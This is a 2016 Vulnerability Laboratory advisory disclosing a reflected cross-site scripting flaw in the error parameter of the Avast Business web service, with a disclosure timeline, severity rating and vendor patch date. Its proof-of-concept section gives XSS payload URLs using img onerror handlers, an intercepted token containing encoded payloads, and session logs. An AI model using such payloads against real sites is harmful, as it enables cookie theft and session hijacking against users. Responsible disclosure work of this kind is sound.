Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]VULNERLAB:1624
Document Title:
===============
AVAST Business #14 - Client Side Cross Site Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1624
Release Date:
=============
2016-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1624
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company.
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the official Avast Business online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-02: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2015-11-24: Vendor Fix/Patch (AVAST Developer Team)
2016-05-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AVAST!
Product: Business - Online Service (Web-Application) 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast Business online service web-application.
The client-side vulnerability allows remote attacker to inject script codes to compromise client-side browser to application requests.
The vulnerability is located in the `error` parameter of the exception-handling in the avast business online-service web-application. Remote attackers are
able to inject script code to manipulate client-side GET methods request to the avast business website. The injetction point is the error value of the
exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and
the request method to inject or execute is GET.
The security risk of the client-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of
malicous script codes or client-side manipulation of affected or connected modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Avast - Business
Vulnerable Parameter(s):
[+] #error
Affected Module(s):
[+] Error - Exception Handling (Web-Server)
Proof of Concept (PoC):
=======================
The client-side cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Link (Intercepted):
https://support.business.avast.com/access/jwtjwt=eyJhbGciOiJIUzI1NiJ9.eyJyZW1vdGVfcGhvdG9fdXJsIjoiaHR0cHM
6XC9cL2lkLmF2YXN0LmNvbVwvYXZ0XC8wMTQwZTMzMTMyZWE0YjEzMTNmMGQxNGM0ODU1Yzc3OWJlNThlZjdiNmY1YjE0NDVkODc5Y2MwM
jQ1NzMxOGY2IiwidXNlcl9maWVsZHMiOnsibnVtYmVyX29mX2RldmljZXMiOjAsInB1cmNoYXNlZF9zdXBwb3J0IjpmYWxzZSwiY291bnR
yeSI6IkJlbGdpdW0iLCJ3ZWJzaXRlIjoiaHR0cDpcL1wvd3d3Lmdvb2dsZS5jb20iLCJhZGRyZXNzIjoiXCI-PGltZyBzcmM9XCJYXCIgb
25lcnJvcj1cImFsZXJ0KDEpXCIXG5cIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj5cbjkwMDAiLCJwdXJjaGFzZWRfc2V
jdXJlbGluZSI6ZmFsc2UsImluZHVzdHJ5IjoiQ09OU1VMVEFOQ1kiLCJwcmVtaXVtX3N1YnNjcmlwdGlvbiI6ZmFsc2UsInB1cmNoYXNlZF9pb
nN0YWxsYXRpb24iOmZhbHNlLCJudW1iZXJfb2ZfZW1wbG95ZWVzIjoiMSAtIDUiLCJwaG9uZSI6IjEzMDAyOTkxMTEiLCJjb21wYW55X25hbWUiOiJCaX
RzZWNcIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj4ifSwibmFtZSI6InNlY3VyaXR5QGtpZXJhbmNsYWVzc2Vucy5iZSIsI
mV4dGVybmFsX2lkIjoiT3BRcV9xdkZTeW1fVDNiNjVsS3lmZzlFUU5EeHYwY1ZqM3BQZjVIZV9vSSIsImlhdCI6MTQ0NTY5MTQ4MSwiZW1haWwiOiJzZWN1cm
l0eUBraWVyYW5jbGFlc3NlbnMuYmUiLCJqdGkiOiIwZjc4NmI2OS03MWE4LTRlMmUtOGIzOS05NjVhNDVmYTZjODcifQ.CDST0tmNRXkc4N7zxJ6wHZ31WCyasEMdabYjeBNhv98
Link (Error Redirect)
https://business.avast.com/public/#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.
Link PoC:
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.cookie)">
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.domain)">
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://business.avast.com/public/K Load Flags[LOAD_NORMAL] GrΓΆΓe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[business.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://business.avast.com/public/]
Cookie[_ga=GA1.3.1707638216.1445943077; _gat_UA-58120669-2=1]
Connection[keep-alive]
Response Header:
Server[nginx/1.6.2]
Date[Tue, 27 Oct 2015 10:53:31 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Strict-Transport-Security[max-age=31536000; includeSubdomains;]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Reference(s):
https://business.avast.com/
https://business.avast.com/public/
https://business.avast.com/public/#error/
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the avast business web-application is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to get a ask permission.
Copyright Β© 2016 | Vulnerability Laboratory - [Evolution Security GmbH]β’